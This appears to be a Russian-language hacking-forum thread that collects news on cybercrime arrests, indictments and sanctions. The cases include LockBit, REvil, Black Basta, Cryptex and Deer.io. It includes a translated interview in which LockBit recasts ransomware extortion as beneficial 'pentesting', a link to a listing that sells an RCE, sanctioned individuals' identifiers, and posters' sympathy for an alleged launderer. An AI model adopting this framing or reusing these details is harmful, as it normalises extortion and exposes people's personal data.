кто-то снова поднял блог, старая ссылка рабочая
Spoiler
админ не бань
В московском офисе Group-IB идут обыски, рассказал RTVI источник близкий к правоохранительным органам. Другой источник добавил, что в офисе идут следственные действия по уголовному делу, в рамках которого задержан основатель и гендиректор компании Group-IB Илья Сачков. Бизнесмена задержали утром во вторник, 28 сентября, отметил собеседник RTVI.
По словам источника RTVI в другой крупной IT-компании, совладельцы Group-IB Сачков и Дмитрий Волков «пропали» и были недоступны даже для своих сотрудников. Во вторник вечером корреспондент RTVI не смог дозвониться по телефонам Сачкова и Волкова. Сообщения с вопросами о возможном уголовном деле также остались без ответа. Не отреагировали на сообщения и представители Group-IB.
Корреспонденты RTVI отправились к офису Group IB на Шарикоподшипниковой улице в Москве в ночь на среду. У входа в здание стояли пассажирский автобус и минивен с тонированными стеклами и включенными габаритами. Человек в штатском перетаскивал вещи из офиса в автобус, а на проходной в самом здании корреспондентов встретили двое вооруженных мужчин в тактической одежде расцветки мультикам и масках на лице. Они сказали корреспондентам, что не пустят внутрь и не будут комментировать происходящее в офисе.

задержано ](https://rtvi.com/news/gendirektor-group-ib-zaderzhan-po- podozreniyu-v-gosizmene)
В московском офисе Group-IB идут обыски, рассказал RTVI источник, близкий к правоохранительным органам. Другой источник добавил, что в офисе идут следственные действия по уголовному делу, в рамках которого задержан основатель и гендиректор компании Group-IB Илья Сачков. Бизнесмена задержали...
 rtvi.com
Вчера на портале Red Hot Cyber появилось новое [интервью](https://www.redhotcyber.com/post/red-hot-cyber-intervista- lockbit-3-0/) c представителем шифровальщика LockBit 3.0 на итальянском языке.
Мы, RHS, связались с LockBit 3.0 и попросили об интервью, чтобы узнать больше о развитии проекта 3.0, а также поговорить о геополитике, членстве, монетизации, выкупах, эволюции ransomware и RaaS, а также об Италии и атаках.
RHS: Здравствуйте, LockBit, не могли бы вы рассказать нам больше о проекте 3.0?
LockBit: Много обновлений, в целом инфраструктура была расширена, увеличена пропускная способность, теперь мы можем работать с неограниченным количеством партнеров. Кроме того, были приобретены и значительно улучшены исходные коды DarkSide/BlackMatter для Windows-локера. Добавлена функциональность от Lockbit 2.0 selfspread и устранено множество ошибок.
RHS: Не могли бы вы рассказать немного больше об инициативе bug bounty?
LockBit: Никакого хакинга, были некоторые мелкие недочеты,, которые побудили нас создать баг баунти, на данный момент уже выплачено $50к тому, кто сообщил мне об ошибке.
RHS: Команда Conti вышла из игры. Вы набираете бывших членов/аффилированных лиц этой группировки?
LockBit: Я не знаю кого набираю, люди приходят к нам и говорят, что хотят работать. Мы не спрашиваем их, откуда они. Ограничений нет.
RHS: На рынке вы уже 2 года. Что отличает вас от остальных RaaS?
LockBit: Слабость и смелость. У меня психическое заболевание, у меня вообще нет страха, я не боюсь быть пойманным или убитым. И, конечно же, модифицированный спутник Илона Маска. Боже, благослови Америку!
RHS: Можете ли вы сказать, сколько человек вращается вокруг вашей RaaS? Учитывая разработчиков, аффилированных лиц, поддержку и т.д. …
LockBit: более 100 человек
RHS: Жертвы, которых вы размещаете на своем сайте утечек данных, - это те, кто не платит выкуп. Многие исследователи сделали прогнозы о том, сколько компаний позволяют вам монетизироваться. Какой процент компаний платит выкуп?
LockBit: От 10% до 50% выплачивают выкуп. Все зависит от того, насколько хорошо была реализована атака, есть ли у жертвы секреты и резервные копии.
RHS: Изменятся ли внутренние вещи в версии 3.0 или они останутся прежними для вашей команды?
LockBit: Изменений много
RHS: На международном уровне, в отличие от Conti, вы не принимаете чью-либо сторону и всегда заявляете, что вы не связаны с политикой. Насколько выгоден такой выбор в текущей геополитической панораме?
LockBit: Это мое личное мировоззрение, я против войны и кровопролития, мы обычные пентестеры и делаем этот мир безопаснее. Благодаря нам компании могут извлечь урок безопасности и закрыть уязвимости, Conti и их ребрендинг BlackBasta - это политические хакеры, они работают над разрушением инфраструктуры только для того, чтобы нанести максимальный ущерб компании. А мы, в свою очередь, приносим пользу всем компаниям в мире и делаем их более безопасными и защищенными.
RHS: Мы видели простои в связи с переходом на версию 3.0. Были ли они связаны с техническими проблемами?
LockBit: Время простоя связано с перемещением инфраструктуры и партнеров, отладкой новых механизмов и, прежде всего, с тем, что в разгар лета многие люди отдыхают и находятся в отпуске.
RHS: Недавно группа KillNet обратилась к нескольким группам, занимающимся распространением шифровальщиков, с просьбой помочь в проведении операций. Что вы думаете о них?
LockBit: Я ничего об этом не знаю, но думаю, что это просто ответные действия в кибервойне, когда Россию атакуют хакеры из США, Европы и Украины. В ответ Россия просто создает свои собственные киберподразделения, что является естественным ходом событий. Сила действия равна силе противодействия. Главное
RHS: Какие основные различия между LockBit 2.0 и 3.0? Откуда берется необходимость обновления?
LockBit: Партнеры постоянно просят о новой функциональности, мы уважаем их пожелания. Проект 3.0 построен на основе приобретенного нами исходного кода DarkSide/BlackMatter, в нем устранены многие ошибки и добавлены новые возможности, а также такие функции как автораспространение. И, самое главное, новый Linux-локер поддерживает 14 архитектур Linux.
RHS: Несколько дней назад банда ransomware скомпрометировала организацию, работающую в секторе здравоохранения в Италии. Что вы думаете об атаках на здравоохранение?
LockBit: Мое мнение о нападении на медицинские организации написано в моем блоге, мы не можем беспечно относиться к безопасности данных, составляющих врачебную тайну, мы должны быть очень осторожны и избирательны с постоплатными пентестами медицинских учреждений, чтобы они думали о защите информации, а не полагались на милость правительственных групп, которые будут просто воровать, чтобы уничтожить их инфраструктуру без возможности заплатить выкуп.
RHS: Теперь поговорим о вас как об элитной операции. Большие цифры и большие доходы. Какой ингредиент позволил вам долгое время оставаться на рынке, привлекая множество партнеров?
LockBit: Честность, мы единственная партнерская программа в мире, которая не трогает выкуп партнеров, все остальные партнерские программы принимают выплаты на ваш кошелек и затем переводят долю партнеров. Однажды, когда сумма становится слишком большой возникает exit scam и ребрендинг, так произошло с партнерской программой Alpha, они обманули партнера на большую выплату и закрыли партнерскую программу DarkSide, теперь ждут новых дураков и новой большой выплаты для следующего ребрендинга.
RHS: Несколько дней назад в СМИ сообщили, что адвокат Revil заявил о том, что российское правительство должно использовать банду в качестве оружия против Украины. что вы думаете об этом?
LockBit: Я думаю, что это вполне реалистично, почему бы и нет? Что бы ты выбрал, швабру в заднице или работу за компьютером?
RHS: Несколько месяцев назад вы атаковали ИТ-инфраструктуру итальянской больницы ULSS6 Euganea. Как бы вы оценили инфраструктуру организации, поставив оценку от 1 до 5?
LockBit: 1
RHS: Как вы в целом оцениваете уровень безопасности итальянских организаций?
LockBit: 1
Перевод непрофессиональный, поэтому могут быть мелкие ляпы и недочёты.
Европол объявил о ликвидации на территории Украины крупной группировки хакеров-вымогателей, жертвами которой стали компании из 71 страны. На сайте ведомства сообщается, что преступники нанесли своими атаками многомиллионный ущерб.
«Предполагается, что подследственные ответственны за серию громких атак с использованием программ-вымогателей на компании в 71 стране, — говорится в официальном сообщении Европола. — Следствие установило, что злоумышленники зашифровали более 250 серверов, принадлежащих крупным корпорациям, в результате чего убытки превысили несколько сотен миллионов евро».
Во время обысков было изъято компьютерное оборудование, автомобили, банковские и SIM-карты, а также криптовалютные активы. Эта операция стала продолжением арестов 2021 года, когда были задержаны 12 человек, связанных с атаками на 1800 жертв в 71 стране.
Сама операция, в ходе которой были арестованы 32-летний руководитель группировки и четверо его ближайших сообщников, была проведена еще 21 ноября. Помощь Национальной полиции Украины оказывали около 20 следователей из Норвегии, Франции, Германии и США. К обыскам и арестам, прошедшим на 30 объектах в Киевской, Черкасской, Ровенской и Винницкой областях, оперативники готовились более двух лет.
Для проведения атак использовались, среди прочего, программы-вымогатели LockerGoga, MegaCortex, HIVE и Dharma. Уже оказавшись в инфраструктуре компании-жертвы, они закреплялись в сети с помощью вредоносов TrickBot, Cobalt Strike и PowerShell Empire.
source: europol.europa.eu/media-press/newsroom/news/international-
collaboration-leads-to-dismantlement-of-ransomware-group-in-ukraine-amidst-
ongoing-war
cyberpolice.gov.ua/news/ponad--milyardy-gryven-zbytkiv-kiberpolicziya-ta-
slidchi-naczpolu-vykryly-xakeriv-yaki-atakuvaly-providni-svitovi-
kompaniyi-1780
Госдепартамент США предлагает вознаграждение в размере 10 миллионов долларов
Федеральные власти предлагают вознаграждение в размере 10 миллионов долларов за информацию, которая приведет к аресту обвиняемого российского хакера, который вымогал миллионы долларов у правоохранительных органов, больниц и школ в Нью-Джерси и других местах.
Российский гражданин Михаил Матвеев 1992 года рождения, проживающий в Калининграде, обвиняется в хакерских атаках на 2800 жертв и требовании выкупа в общей сложности не менее 400 миллионов долларов, сообщили в Департаменте юстиции США.
По данным двух обвинительных заключений, которые были обнародованы Департаментом юстиции США, Матвеев, являющийся гражданином и резидентом России, использовал три различных варианта вымогательского ПО (ransomware) для атаки на жителей США.
Согласно обвинениям, жертвы этих атак заплатили около 200 миллионов долларов. Среди пострадавших - правоохранительные органы в Нью-Джерси и Вашингтоне, организации в сфере здравоохранения, а также школы по всему штату.
В июне 2020 года Матвеев атаковал полицию в Пассаик-Парк, а в мае прошлого года - на некоммерческую организацию в области психического здоровья в округе Мерсер. Также он атаковал Метрополитен Полис Департамент в Вашингтоне.
"Благодаря выдающейся следственной работе прокуроров моего офиса и наших партнеров из ФБР, Матвеев больше не скрывается в тени", - заявил прокурор округа Нью-Джерси Филипп Селлингер. "Мы публично идентифицировали его преступные действия и предъявили ему множество федеральных обвинений. Пусть сегодняшние обвинения станут напоминанием для всех киберпреступников. Мой офис посвящен борьбе с киберпреступностью и не пожалеет ресурсов для привлечения к ответственности тех, кто использует атаки с требованием выкупа для атаки на жертв".
Использованные Матвеевым варианты вымогательского ПО известны как LockBit, Babuk и Hive. Схема действий была примерно одинакова: сначала хакеры получали доступ к уязвимым компьютерным системам, затем они отправляли заметку жертве с требованием оплаты в обмен на дешифровку данных жертвы или воздержание от их публичного разглашения. Если жертва не уплачивала требуемую сумму, данные обычно публиковались на публичных сайтах, так называемых сайтах утечек данных.
Матвеев использовал множество псевдонимов, включая Wazawaka, m1x, Boriselcin и Uhodiransomwar. Ему предъявлены обвинения в сговоре по передаче требований о выкупе, сговоре по нанесению ущерба защищенным компьютерам и умышленном нанесении ущерба защищенным компьютерам. В случае признания вины он может получить более 20 лет тюремного заключения.
source:
justice[.]gov/opa/pr/russian-national-charged-ransomware-attacks-against-
critical-infrastructure
twitter.com/ransomboris/status/1658506337725054977
Pavel Durov, founder and president of the encrypted messaging service Telegram, arrested this evening in France. arrested as he got off his private jet on the tarmac at Le Bourget airport. At 39, this Franco-Russian billionaire was the subject of a search warrant.
Click to expand...

interpellé à sa descente d’avion ](https://policeetrealites.com/2024/08/24/🇫🇷-le-bourget-le-fondateur-de-la- messagerie-cryptee-telegram-interpelle-a-sa-descente-davion/)
INFO @TF1Info @LCIPavel Durov, fondateur-président de la messagerie cryptée Telegram, interpellé ce soir en France.➡arrêté à la descente de son jet privé sur le tarmac de l’aéroport du Bourget. A 3…
 policeetrealites.com
По 25 адресам мест пребывания 14 участников организованного преступного сообщества изъяли свыше 426 млн рублей, в том числе в криптовалюте, 600 тыс. долларов, 500 тыс. евро, а также компьютерную технику, криптокошельки, использовавшиеся для совершения преступлений, 20 автомобилей премиум-класса, приобретенные на денежные средства, полученные преступным путем.
](http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html)
Подробная информация
www.fsb.ru
](https://tsargrad.tv/news/fsb-zaderazhal-gruppu-hakerov-po-zaprosu- ssha_477893)
ФСБ сообщила, что пресекла деятельность хакерской группировки REvil, которой в США приписывали большую кибератаку Kaseya.
tsargrad.tv
Утро началось с хороших новостей.
Вчера сообщили о технических работах, сегодня их уже взломали. Совпадение ?
По неподтверженной информации только в битке было утеряно 133 btc
Один из сотрудников утверждает что в скоре проблемы решат и что деньги у них в
сохранности.
P.s. Надеюсь тут мало тех кто держал деньги в их
боте
21 января 2022 года ФСБ России в ходе проведения спецоперации совместно с российскими спецслужбами при поддержке правоохранительных органов США задержала в Москве четырех предполагаемых членов хакерской группировки The Infraud Organization.
После проведения обысков и задержаний, хакеры были доставлены в суд. Московский суд отправил в СИЗО на 2 месяца основателя группы Андрея Новака после предъявления ему обвинения по части 2 статьи 272 УК (неправомерный доступ к компьютерной информации), а трех остальных задержанных членов The Infraud Organization суд отправил под домашний арест. Причем Кириллу Самокутяеву и Константину Бергману вменяется такая же статья 272 УК, а вот Марку Бергману было предъявлено обвинение по части 2 статьи 187 УК РФ (неправомерный оборот средств платежей, совершенный организованной группой).
В США Новак был объявлен ФБР в розыск по обвинению в кибермошенничестве. По данным экспертов «ТАСС», хакерская группа The Infraud Organization занималась кражей и продажей данных банковских карт, а также другой персональной информации, включая базы данных американских граждан. В США им инкриминируется причинение ущерба от преступных действий в объеме $530 млн.
По словам источников издания, следственная группа ФСБ и МВД продолжает изучать материалы дела и устанавливать других участников The Infraud Organization. Эксперты считают, что Россия не выдаст США Новака и его команду, так как законодательство страны запрещает выдачу иностранному государству граждан своей страны.
source: tass.ru/proisshestviya/13497491
Hidden content for authorized users.
на BF какой-то ублюдок продает RCE на xss.is. Я не знаю, насколько это подлинный, но проверить стоит.
hxxps://breachforums[.]st/Thread-SELLING-POLITICAL-BANKS-WEBSITES- VULNERABILITIES
28 сентября в Украине в ходе совместной операции Национальной полиции Украины, Жандармерии Франции и ФБР (США) при координации Европола и Интерпола арестовали двух операторов-шифровальщиков, которые требовали выкупы от компаний-жертв (выкупы от 5 до 70 миллионов евро). Названия группировок не указываются.
Итоги операции:
• 2 ареста и 7 обысков имущества
• Наложение ареста на 375 000 долларов США наличными
• Конфискация двух роскошных автомобилей стоимостью 217 000 евро
• Замораживание активов на сумму 1,3 миллиона долларов в криптовалюте
Кто принимал участие в операции:
National Cybercrime Centre (C3N)
Cyber Police Department of the National Police of Ukraine
Atlanta Field Office of the Federal Bureau of Investigation
Европол: European Cybercrime Centre (EC3)
Интерпол: Cyber Fusion Centre
On 28 September, a coordinated strike between the French National Gendarmerie (Gendarmerie Nationale), the Ukrainian National Police (Національна поліція України) and the United States Federal Bureau of Investigation (FBI), with the coordination of Europol and INTERPOL, has led to the arrest in...
www.europol.europa.eu
Целый ряд новостей:
1) Названо публично имя Талеона - Иванов-Омельницкий, озвучена его связь с обменниками и платежными системами - UAPS/pinspay и Cryptex/pm2btc, добавили в список санкций.
The following individual has been added to OFAC's SDN List:
IVANOV, Sergey Sergeevich (Cyrillic: ИВАНОВ, Сергей Сергеевич) (a.k.a. OMELNITSKII, Sergey Sergeevich (Cyrillic: ОМЕЛЬНИЦКИЙ, Сергей Сергеевич); a.k.a. "Taleon"; a.k.a. "UAPS"), St. Petersburg, Russia; DOB 02 Jun 1980; POB Russia; nationality Russia; Gender Male; Secondary sanctions risk: See Section 11 of Executive Order 14024.; Passport 4015431802 (Russia) (individual) [RUSSIA-EO14024].
The following entity has been added to OFAC's SDN List:CRYPTEX (a.k.a. INTERNATIONAL PAYMENT SERVICE PROVIDER LLC), Euro House, Richmond Hill Road, P.O. Box 2897, Kingstown, Saint Vincent and the Grenadines; Website cryptex.net; Digital Currency Address - XBT 13JtX4h7G5ZuNK5mFudKGq9DHLvvMFuNuz; Digital Currency Address - ETH 0x0931cA4D13BB4ba75D9B7132AB690265D749a5E7; Secondary sanctions risk: See Section 11 of Executive Order 14024.; Digital Currency Address - LTC M8yFL6SFC6TreATegTyuSYkDfDRbisdpT3; Organization Established Date 01 Dec 2021; Digital Currency Address - TRX TTUDyVhhpCC1xJoPmWzdjLAzeoPwbSABdr; Business Registration Number 1628 (Saint Vincent and the Grenadines) [CYBER2] [RUSSIA-EO14024].
Click to expand...
Cryptex, виртуальная валютная биржа, зарегистрированная в Сент-Винсенте и Гренадинах как «Международный поставщик платежных услуг», предоставляла финансовые услуги киберпреступникам и работала в секторе финансовых услуг экономики Российской Федерации. Cryptex рекламировала свои услуги на русском языке и получила более 51,2 млн долларов США в виде средств, полученных от атак с использованием программ-вымогателей. Cryptex также связана с более чем с 720 млн долларов США в переводах от программ-вымогателей и киберпреступников, в том числе от мошеннических магазинов, миксеров, бирж, не имеющих программ KYC, и от отмеченной OFAC виртуальной биржи Garantex. OFAC вносит Cryptex в санкционный список в соответствии с Указом президента (E.O.) 13694 с поправками, внесенными Указом президента 13757 («E.O. 13694 с поправками»), за ответственность или соучастие или за участие, прямо или косвенно, в кибердеятельности, определенной в соответствии с Указом президента. 13694 с поправками и в соответствии с Указом президента 14024 за работу или деятельность в секторе финансовых услуг экономики Российской Федерации.
Сергей Сергеевич Иванов — предполагаемый российский отмывщик денег, который отмыл сотни миллионов долларов виртуальной валюты для злоумышленников, брокеров начальных доступов, продавцов на рынке даркнета и других преступных субъектов в течение примерно последних 20 лет. Через различные службы обработки платежей, в том числе ту, которая ведет бизнес под названием «UAPS», Иванов обеспечивал процессинг платежей для различных мошеннических магазинов, включая Genesis Market, включенный в список OFAC, веб-сайт которого был закрыт правоохранительными органами в 2023 году. В настоящее время Иванов связан с Cryptex. OFAC вносит Иванова в список в соответствии с Указом президента 14024 за работу или деятельность в секторе финансовых услуг экономики Российской Федерации.
https://home.treasury.gov/news/press-releases/jy2616
https://ofac.treasury.gov/recent-actions/20240926
2) Впервые озвучено имя одного из совладельцев Joker 's Stash - Тимура Шахмаметова, известного как Vega, обещано до 10 миллионов долларов за информацию, ведущую к аресту любого из сопричастных, и до 1 миллиона долларов за любую информацией о реальных личностях, стоящих за платежной системой.
Госдепартамент объявляет о вознаграждении в рамках Программы вознаграждений за транснациональную организованную преступность в размере до 10 миллионов долларов за информацию, которая приведет к аресту и/или осуждению Тимура Шахмаметова и Сергея Иванова за участие, сговор с целью участия и попытку участия в транснациональной организованной преступности. Отдельные вознаграждения в размере до 1 миллиона долларов за информацию, которая приведет к идентификации других лидеров преступного рынка Joker’s Stash (кроме Шахмаметова), а также идентификации других ключевых лидеров транснациональных преступных группировок UAPS, PM2BTC и PinPays (кроме Иванова), также предлагаются.
По данным Секретной службы США (USSS), Шахмаметов предположительно использовал
псевдоним «JokerStash» в качестве создателя/оператора Joker’s Stash, одного из
самых прибыльных онлайн-магазинов украденных кредитных карт и
скомпрометированной личной информации. Иванов отмывал доходы от Joker’s Stash.
USSS утверждает, что Иванов является надежным, долгосрочным поставщиком
услуг по отмыванию денег для киберпреступников высшего уровня примерно с 2005
года. <- рекомендация от СекретСервиса дорогого стоит
[https://www.state.gov/transnational...urrency-exchanges-and-cybercrime- facilitator/](https://www.state.gov/transnational-organized-crime-rewards- program-offers-for-two-russian-nationals-and-sanctions-on-illicit-russian- virtual-currency-exchanges-and-cybercrime-facilitator/)
Специально для Cobalt_bomb его друзья из ФБР сняли новый (конечно же тупой) мультик за счет американских налогоплательщиков: https://operation-endgame.com/
**3) На трех известных мне доменах висит дефейс:http://cryptex.net/, http://apsyourfriend.cc/ и https://pm2btc.me/
**
Самое смешное, что админы допустили косяк с сертификатом на последнем домене,
и я лицезрел следующую ошибку:
Websites prove their identity via certificates. Firefox does not trust this
site because it uses a certificate that is not valid for pm2btc.me. The
certificate is only valid for the following names: riotx.info, simexvtn.com,
simexbiz.com, okex-nft.net, test3.usssdomainseizure.com, simexrue.com,
simexcbr.com, simexwim.com, test.usssdomainseizure.com, simexarts.com,
solanaftxdex.com, test2.usssdomainseizure.com, simexlua.com, www.okex-
nft.net, usssdomainseizure.com,
www.usssdomainseizure.com
4) Конечно же без Кребса никуда - и он с удовольствием порылся в том грязном белье, что ему насливали его источники из ФБР, например показал фото вертолета, которым управляет Талеон:
+ Кребс опять удивительным образом получил информацию (это объясняется его источником из русского инфосека, я так думаю), что Vega - это v1pee, создатель команды Nerf: https://web.archive.org/web/20041207210236/http://nerf.ru/index.php?i=about
https://krebsonsecurity[.]com/2024/09/u-s-indicts-2-top-russian-hackers- sanctions-cryptex/
Будет чего новое - дополню.
Пацаны, держитесь! Когда тебя рекомендует сам СекретСервис как надежного,
долгосрочного поставщика услуг по отмыванию денег для киберпреступников
высшего уровня - это дорогого стоит
Россиянин Алексей Бурков уже почти четыре года находится в израильской тюрьме. Он был арестован по запросу США в декабре 2015 года. Верховный суд Израиля одобрил его экстрадицию в Соединённые Штаты, однако решение до сих пор не подписал министр юстиции страны. Всё это время выдачи Буркова добивается и российская сторона. В разговоре с RT мужчина рассказал об условиях содержания в заключении, а также о выдвигаемых против него обвинениях. Между тем родственники россиянина направили в МИД РФ просьбу начать переговоры о возможном обмене Буркова на гражданку Израиля Нааму Иссахар, задержанную в московском аэропорту в сентябре 2019-го.
Алексея Буркова арестовали в израильском аэропорту в декабре 2015 года, когда он вместе с девушкой собирался улететь домой. В Израиле пара была на отдыхе, а Бурков, по его словам, даже не подозревал, что находится в розыске по линии Интерпола.
«Меня арестовали по стандартной для США схеме, — поясняет в беседе с RT Бурков. — За те восемь дней, что я находился в стране, американцы внесли меня в базу Интерпола, после чего меня фактически похитили из аэропорта. При аресте мне не предоставили доступ к российскому консулу, но сказали, что я подозреваюсь в мошенничестве с недвижимостью в США. Однако потом в итоге обвинили в причастности к утечке информации, кибератаках и мошенничестве в компьютерной сфере. Всего мне предъявлено пять обвинений, о которых детально рассказывать я не могу».
По словам собеседника, до ареста он жил в Петербурге и работал программистом- фрилансером.
«Я обычный человек. Занимался информационной безопасностью и программированием, работал с базами данных. Действительно, когда-то давно у меня были контакты с людьми, которые могли быть причастны к хакерству, но лично я преступления не совершал, просто американцы решили всё свалить на меня, сделав крайним. К 99% материалов обвинения лично я никакого отношения не имею».
Тогда, в 2015 году, об аресте «русского хакера» сообщили все российские СМИ. Однако вскоре о Буркове забыли. А он всё это время провёл в израильской тюрьме.
Первые месяцы нахождения в израильской тюрьме Бурков вспоминает с содроганием.
«Сначала меня держали в ужасных условиях, — говорит он. — Я сидел в карцере, иногда без еды и воды. Потом пару месяцев был в полной изоляции. Звонки и визиты были запрещены — даже с адвокатом связаться не мог. Я долго добивался улучшения условий содержания и в итоге оказался в камере на 12 человек. Там были провокации, драки заключённых. За это время я успел побывать в трёх тюрьмах. Сейчас меня держат в «Адарим», где всё относительно спокойно».
«У меня тромбоз сосудов и с ногой дела не очень хорошо, — поясняет он. — Ни врачебного осмотра, ни лекарств я так и не получил. Кроме того, мне не лечат зубы — по местным правилам на стоматологическую помощь могут рассчитывать только те, кто уже осуждён. Я просто стараюсь об о всём этом не думать».
По словам россиянина, за то время, что он находится под стражей, было много судебных заседаний.
«Это и продления ареста, и рассмотрение запроса США на выдачу, — говорит он. — В сентябре Верховный суд Израиля постановил экстрадировать меня в США. Чтобы это решение вступило в силу, его должен подписать министр юстиции Израиля. Но когда оно будет подписано и будет ли — неизвестно. Это, насколько я понимаю, никак не регламентировано».
Экстрадиции Буркова всё это время добивается и Россия, где на него заведено уголовное дело о мошенничестве.
«Я сам написал чистосердечное признание — изложил там всё, за что меня хотят осудить США. Пусть российские органы и суд разбираются. Если они сочтут меня виновным, то я готов понести наказание», — поясняет он.
При этом запрос России на экстрадицию Буркова, в отличие от американского, до сих пор не рассмотрен в суде.
Сам Бурков уверен, что запрос из России не рассматривается из-за давления американских властей.
Российские дипломаты, в свою очередь, поясняют, что между Израилем и США действует двухстороннее соглашение об экстрадиции, а между Россией и Израилем такого соглашения нет.
По словам российских дипломатов, разрешению ситуации с Бурковым препятствует и то, что в Израиле недавно прошли внеочередные парламентские выборы и в настоящий момент в стране только формируется правительство.
«Это тормозит процесс, а человек продолжает сидеть, — отмечают в российском посольстве в Израиле. — Мы пытались сотрудничать с прошлым министром юстиции, она не шла на контакт в этом вопросе. Мы надеемся, что с новым министром — Амиром Оханой — дело сдвинется, но пока положительных результатов нет».
По словам представителей посольства, если Охана подпишет решение Верховного суда Израиля на экстрадицию Буркова в США, оно будет обжаловано.
В сентябре 2019 года семья Буркова направила в российский МИД обращение с просьбой инициировать переговоры с Израилем на тему обмена Буркова на арестованную в России израильтянку Нааму Иссахар.
Как сообщал RT, девушка была задержана в аэропорту Шереметьево, где ждала транзитный рейс. В её багаже был обнаружен гашиш. Дело Иссахар рассматривается в Химкинском городском суде — ей инкриминируют хранение и контрабанду наркотиков.
По словам сестры россиянина Натальи Бурковой, официальный ответ на обращение в МИД семья не получила. «Нам только позвонил сотрудник МИД, который сказал, что этим вопросом занимаются», — поясняет Буркова в беседе с RT.
Друг арестованного россиянина Константин Бекенштейн, в свою очередь, рассказал RT, что обсуждал с родственниками Иссахар возможность гуманитарного обмена заключёнными, но навстречу они не пошли.
По словам Бекенштейна, который давно живёт в Израиле и регулярно навещает русского «хакера» в тюрьме, обмен — единственный шанс для Буркова избежать несправедливого суда в США.
В посольстве Израиля в России не стали комментировать возможность обмена Иссахар на Буркова. Мать девушки Яффа Иссахар на вопросы RT также не ответила.
В посольстве России в Тель-Авиве RT пояснили, что Израиль официально с таким предложением к российским дипломатам не выходил.
«Что касается ситуации с Иссахар, то нам официальных обращений от израильской стороны на этот счёт не поступало. С нашей стороны официальных предложений также не было», — говорят в российском посольстве.
Сам Бурков надеется, что израильские власти всё же передумают и отправят его в Россию вместо США.
«Наши дипломаты говорят, что Израиль не хочет ругаться ни с Россией, ни с США, — отмечает он. — Поэтому они, очевидно, решили просто держать меня под стражей у себя. Даже если я нарушил американские законы, то сделал это не по умыслу. Но главная проблема заключается в том, что если американцам за такие преступления дают пару лет тюрьмы, то русским — десятки лет заключения».
Алексей Бурков
Обнаружена активность новой хакерской группировки Black Basta , которая была сформирована в апреле 2022 года предположительно из бывших членов Conti и REvil . Однако, действующие члены Conti на своём форуме опровергли участие в новой группе, заявив, что Black Basta «просто дети».
«Поскольку Black Basta относительно новая, о группе мало что известно. Исходя из их быстрого развития и точности атак, можно предоположить, что Black Basta управляется бывшими членами банд Conti и REvil», — сказал Лиор Див, генеральный директор и соучредитель Cybereason.
По данным Cybereason, Black Basta использует методы двойного вымогательства. Группа крадет файлы организации, а затем угрожает опубликовать украденные файлы, если компания не заплатит выкуп.
Сама атака осуществляется в партнерстве с вредоносным ПО QBot , что упрощает разведку при сборе данных о цели. Затем банда атакует контроллер домена и осуществляет боковое перемещение с помощью PsExec. Далее хакеры отключают антивирусное ПО и развертывает программу-вымогатель с помощью закодированной PowerShell команды, которая использует инструмент управления Windows для отправки программы-вымогателя на необходимый IP-адрес.
source: cybereason.com/blog/cybereason-vs.-black-basta-ransomware
ФБР арестовало гражданина России, который, предположительно, поддерживал продажу взломанных учётных записей и персональных данных пользователей Сети. Подозреваемого задержали в субботу, 7 марта, в аэропорте имени Джона Кеннеди (Нью-Йорк).
Кирилл Викторович Фирсов, как считает ФБР, управлял платформой Deer.io (похожа по принципу работы на Shopify), на которой располагались онлайн-магазины, занимающиеся нелегальной деятельностью.
В соответствующем ордере на арест указано, что Фирсов принимал участие в работе платформы Deer.io с самого её запуска — октября 2013 года.
Сервис Deer.io позволяет размещать онлайн-магазины за $12 в месяц. По словам самого обвиняемого, на площадке его проекта работали более 24 тыс. магазинов, которые принесли Deer.io более $17 миллионов.
Американские правоохранители завели уголовное дело, согласно которому Deer.io почти полностью использовалась в киберпреступных целях. При этом сами представители платформы убеждали, что она выступает хостингом исключительно для легитимного бизнеса.
Сотрудники ФБР нашли на площадке Фирсова магазины, продающие доступ к взломанным аккаунтам, серверам и персональным данным пользователей (номерам социального страхования, датам рождений, физическим адресам).
При этом правоохранители заявили, что Фирсов был в курсе того, какие «клиенты» пользуются его платформой. Боле того, подозреваемый не раз рекламировал Deer.io на форумах киберпреступной тематики.
• Source: https://ru.scribd.com/document/451008612/Firsov-Arrest
• Source: https://ru.scribd.com/document/451009057/Firsov-Indictment
• Source: [https://www.zdnet.com/article/fbi-a...er-io-a-shopify-like- platform-for-cybercrime/](https://www.zdnet.com/article/fbi-arrests-russian- behind-deer-io-a-shopify-like-platform-for-cybercrime/)
Кирилл Фирсов. Дата рождения 08 июля 1991 года в городе Краснодар. В столицу перебрался в 2001 году, высшее образование МПИ ФСБ РФ, работаю в IT разработчиком, сейчас есть собственные проекты.
Кирилл Викторович Фирсов (род. 8 июля 1991, Россия) — российский хакер, международно эксперт в области компьютерной безопасности, ставший известным благодаря обнаружению серьезных уязвимостей в популярном кроссплатформенном мессенджере «Telegram». Кроме того, известен, как участник многочисленных соревнований CTF в составе команд xeksec и Antichat. В составе команды Antichat является победителем CTF соревнований в рамках конференций PHDays 2016 и PHDays 2017.
• Source: https://www.instagram.com/kfirsov/
• Source:
• Source: https://www.tripadvisor.ru/Profile/kfirsov?fid=43ba073b-309d-45dc-b757-53d1f7a5720e
и . т . д.
https://www.bleepingcomputer[.]com/...r-pompompurin-arrested-on-cybercrime- charges/
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512Although I had already suspected it to be the case,...
breached.vc
__https://twitter.com/x/status/1610302930069889024
Не прошло и недели после того, как Breached накрыли, а энтузиасты на хайпе пытаются подтянуть тему под себя.
Позиционирующий себя бывшим членом банды Anonymous, хакер-аноним с псевдонимом Pirata в Twitter начал собирать команду админов для новой площадки, которую он уже запустил на замену BF.
__https://twitter.com/x/status/1640400682787258400
Все бы ничего, если не сомнительный нейминг - kkksecforum, на который сразу же обратили внимание VX-underground, которые заприметили в аббревиатуре аналогию с Ku Klux Klan, а сам ресурс прозвали «форумом белых националистов по кибербезопасности».
Pirata отверг все аналогии и по этому поводу решил разместить на сайте несколько объявлений с разъяснением ситуации, отдельно отметив значение KKK в качестве LOL (по-португальски).
В свою очередь, vx-underground позже привели пример того, что многие бразильцы пишут «ккккккккк» вместо «хахахаха». Тем не менее, остались при своем мнении о крайне неудачном выборе названия, с которым в комментариях практически все согласились.
В любом случае сегмент Raid и Breach продолжит оставаться в тренде даркнета, но уже под новыми брендами, один из них - kkksecforum, уже в деле.
Источник: ТГ канал SecAtor (https://t.me/true_secator/4223)
